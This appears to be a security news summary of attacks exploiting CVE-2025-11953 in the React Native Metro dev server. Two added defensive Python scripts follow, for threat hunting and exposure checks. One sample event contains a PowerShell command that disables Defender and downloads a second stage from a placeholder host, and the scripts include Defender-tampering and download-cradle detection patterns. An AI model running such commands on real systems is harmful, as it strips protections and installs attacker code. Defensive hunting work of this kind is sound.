Critical React Native Metro dev server bug under attack as researchers scream into the void
Summary
Security researchers have observed active exploitation of a critical command-injection flaw in the Metro development server used by the React Native Community CLI (CVE-2025-11953). The vulnerability allows unauthenticated attackers to send requests that execute arbitrary code on affected Windows and Linux systems. Proof-of-concept exploits were published quickly after disclosure, and real-world attacks delivering multi-stage payloads have been seen in the wild.
Key Points
- The flaw is in the React Native Community CLI’s Metro dev server endpoint and is tracked as CVE-2025-11953.
- The package is widely used (around 2.5 million weekly downloads), increasing exposure among developers and build environments.
- Unauthenticated network attackers can run malicious executables or arbitrary shell commands via a POST request.
- JFrog and VulnCheck observed exploitation starting in December; proof-of-concept code appeared the day the bug was disclosed.
- Observed attacks used a PowerShell-based loader that disabled Microsoft Defender before fetching a Rust binary with anti-analysis tricks.
- Researchers warn that EPSS currently underrates the exploitation probability despite clear, internet-exposed targets.
- Specific attacker infrastructure (IP addresses and payload hosts) has been identified by researchers.
Content summary
JFrog researchers discovered the Metro dev server bug and disclosed it after Meta issued a fix. The weakness exposes an endpoint that can be abused for OS command injection, giving attackers a remote lane into developer machines and CI hosts. Attackers delivered a multi-stage payload: an initial loader executed via cmd.exe/PowerShell that disables Defender and then retrieves a Rust binary designed to evade analysis. Exploitation was seen in December and continued into January.
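The loader chain described above (a shell spawned from the dev server, Defender tampering, a second stage fetched from a remote host) can be hunted in process-creation telemetry. What follows is an added example, not code from the article, JFrog, VulnCheck or the React Native project. The events are constructed in the shape of Sysmon Event ID 1 records (field names follow Sysmon's schema, values are made up), and the assumption that an injected command shows up as a child of a node process, because Metro is a Node.js server, is mine rather than a detail the article states.

```python
"""Hunt for the Metro-exploitation chain in process-creation telemetry.

Added example (not the article's or the project's code). Events are constructed
Sysmon-style records; the payload host below is a placeholder, not an indicator
taken from the researchers' reports."""

import re

# Shells on both affected platforms (Windows and Linux).
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "sh", "bash"}

# Assumption for this example: Metro runs under node, so a command injected
# through the dev server is spawned with node as its parent.
DEV_SERVER_IMAGES = {"node.exe", "node"}

# Defender-tampering and download-cradle tokens commonly used in detection content.
DEFENDER_TAMPER = re.compile(
    r"Set-MpPreference|Add-MpPreference|DisableRealtimeMonitoring|ExclusionPath",
    re.IGNORECASE,
)
DOWNLOAD_CRADLE = re.compile(
    r"Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString|\bcurl\b|certutil",
    re.IGNORECASE,
)


def basename(path):
    """Image name without directory, normalised for Windows and POSIX separators."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def evaluate(event):
    """Return the rule names matched by one process-creation event."""
    hits = []
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    if parent in DEV_SERVER_IMAGES and image in SHELLS:
        hits.append("dev_server_spawned_shell")
    if image in SHELLS and DEFENDER_TAMPER.search(cmdline):
        hits.append("defender_tampering")
    if image in SHELLS and DOWNLOAD_CRADLE.search(cmdline):
        hits.append("download_cradle")
    return hits


def hunt(events):
    """Return [(EventRecordID, [rules])] for every event matching at least one rule."""
    findings = []
    for ev in events:
        hits = evaluate(ev)
        if hits:
            findings.append((ev["EventRecordID"], hits))
    return findings


# Constructed sample telemetry.
SAMPLE_EVENTS = [
    # Normal build: node spawns node, never a shell.
    {"EventRecordID": 1, "ParentImage": r"C:\Program Files\nodejs\node.exe",
     "Image": r"C:\Program Files\nodejs\node.exe",
     "CommandLine": "node ./node_modules/.bin/metro"},
    # The chain from the article: Metro's node process spawns cmd.exe, which runs a
    # Defender-disabling PowerShell loader that fetches a second stage.
    {"EventRecordID": 2, "ParentImage": r"C:\Program Files\nodejs\node.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'cmd.exe /c powershell -c "Set-MpPreference -DisableRealtimeMonitoring $true; '
                    'Invoke-WebRequest http://payload-host.invalid/stage2 -OutFile $env:TEMP\\s.exe"'},
    # An admin adding an exclusion from an interactive console: tampering fires, lineage does not.
    {"EventRecordID": 3, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Add-MpPreference -ExclusionPath C:\\build"},
]

if __name__ == "__main__":
    for rec_id, rules in hunt(SAMPLE_EVENTS):
        print(f"event {rec_id}: {', '.join(rules)}")
```

The lineage rule is the high-signal one for this bug: a developer's bundler has no business launching cmd.exe or sh, so that edge alone is worth an alert even when the command line is obfuscated and the keyword rules stay silent.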
Context and relevance
Developer tooling is an attractive target: widely installed, inconsistently monitored, and often treated as non-production software on laptops and CI systems. A critical vulnerability in a ubiquitous package like the React Native CLI can enable supply-chain style compromises, lateral movement in developer networks, and direct infection of build artefacts or app packages.
Why should I read this
If you work with React Native or run developer machines and CI systems, this matters — big time. It’s an easy-to-exploit, high-severity hole in tooling that sits on dev endpoints. Patch the CLI, check internet-exposed ports for Metro servers, hunt for the described PowerShell loader or unexpected Rust binaries, and review logs for connections to the listed IPs/hosts. We did the digging so you can act fast.
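Two of the checks listed above (find Metro servers listening beyond loopback, and review the dev server's request log for remote clients or known attacker addresses) can be scripted. This is an added example, not code from the article, JFrog, VulnCheck or the React Native project. It assumes Metro's default port 8081; the `ss -ltn` output and the access-log lines are constructed, the IOC address is a placeholder to be replaced with the researchers' published indicators, and the `/open-url` path in the sample log is the endpoint I assume to be the affected one, which the article does not name.

```python
"""Triage helpers: exposed Metro listeners and suspicious dev-server requests.

Added example (not the article's or the project's code). Sample `ss` output,
log lines and the IOC set are constructed placeholders."""

import ipaddress
import re

METRO_PORT = 8081  # Metro's default port
IOC_IPS = {"203.0.113.45"}  # placeholder (TEST-NET-3), fill from the published indicators


def is_local(host):
    """True only for loopback; wildcard binds and routable addresses count as exposed."""
    host = host.strip("[]")
    if host in ("*", "0.0.0.0", "::"):
        return False
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        return host == "localhost"


def exposed_metro_listeners(ss_output, port=METRO_PORT):
    """Parse `ss -ltn` style lines; return Metro listeners bound beyond loopback."""
    exposed = []
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] != "LISTEN":
            continue
        local = fields[3]
        host, _, lport = local.rpartition(":")
        if lport == str(port) and not is_local(host):
            exposed.append(local)
    return exposed


# Common Log Format: client, ident, user, [time], "METHOD path proto", status, size
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def suspicious_requests(log_lines, ioc_ips=IOC_IPS):
    """Flag POSTs from non-loopback clients and any request from a known attacker IP."""
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        src, method, path = m["src"], m["method"], m["path"]
        reasons = []
        if method == "POST" and not is_local(src):
            reasons.append("remote_post_to_dev_server")
        if src in ioc_ips:
            reasons.append("known_attacker_ip")
        if reasons:
            findings.append((src, method, path, reasons))
    return findings


# Constructed `ss -ltnp` output: a Vite server on loopback, Metro on all interfaces, sshd.
SS_SAMPLE = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      511    127.0.0.1:5173      0.0.0.0:*         users:(("node",pid=4242,fd=20))
LISTEN 0      511    0.0.0.0:8081        0.0.0.0:*         users:(("node",pid=4311,fd=19))
LISTEN 0      128    [::]:22             [::]:*            users:(("sshd",pid=901,fd=3))
"""

# Constructed access log for the dev server; /symbolicate and /status are ordinary Metro traffic.
LOG_SAMPLE = [
    '127.0.0.1 - - [10/Jan/2026:09:12:01 +0000] "GET /index.bundle?platform=android HTTP/1.1" 200 5120',
    '127.0.0.1 - - [10/Jan/2026:09:12:05 +0000] "POST /symbolicate HTTP/1.1" 200 310',
    '203.0.113.45 - - [10/Jan/2026:09:14:37 +0000] "POST /open-url HTTP/1.1" 200 0',
    '198.51.100.7 - - [10/Jan/2026:09:15:02 +0000] "GET /status HTTP/1.1" 200 11',
]

if __name__ == "__main__":
    print("exposed listeners:", exposed_metro_listeners(SS_SAMPLE))
    for src, method, path, reasons in suspicious_requests(LOG_SAMPLE):
        print(f"{src} {method} {path}: {', '.join(reasons)}")
```

Run the first check against real `ss -ltnp` output on build agents and developer laptops; any Metro listener on `0.0.0.0`, `*` or `::` is reachable by whoever can route to the host, which is exactly the precondition the unauthenticated exploit needs. Metro does not write a Common Log Format access log by itself, so the second check assumes a reverse proxy or host firewall log in front of it, or a packet capture converted to that shape.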
